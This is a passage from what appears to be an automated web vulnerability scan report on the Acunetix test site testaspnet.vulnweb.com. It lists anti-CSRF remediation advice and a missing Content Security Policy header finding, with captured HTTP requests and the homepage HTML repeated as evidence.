href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Instances	29
Solution	Phase: Architecture and Design Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. For example, use anti-CSRF packages such as the OWASP CSRFGuard. Phase: Implementation Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script. Phase: Architecture and Design Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330). Note that this can be bypassed using XSS. Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation. Note that this can be bypassed using XSS. Use the ESAPI Session Management control. This control includes a component for CSRF. Do not use the GET method for any request that triggers a state change. Phase: Implementation Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.
Reference	http://projects.webappsec.org/Cross-Site-Request-Forgery http://cwe.mitre.org/data/definitions/352.html
Tags	OWASP_2021_A01 WSTG-v42-SESS-05 OWASP_2017_A05
CWE Id	352
WASC Id	9
Plugin Id	10202

Medium	Content Security Policy (CSP) Header Not Set
Description	Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page — covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.

URL	http://testaspnet.vulnweb.com
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 219 bytes.	GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 220 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache
Request Body - size: 0 bytes.
Response Header - size: 296 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=p2ttr345zecuqfmoxygyermi; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:14 GMT Content-Length: 14064
Response Body - size: 14,064 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" 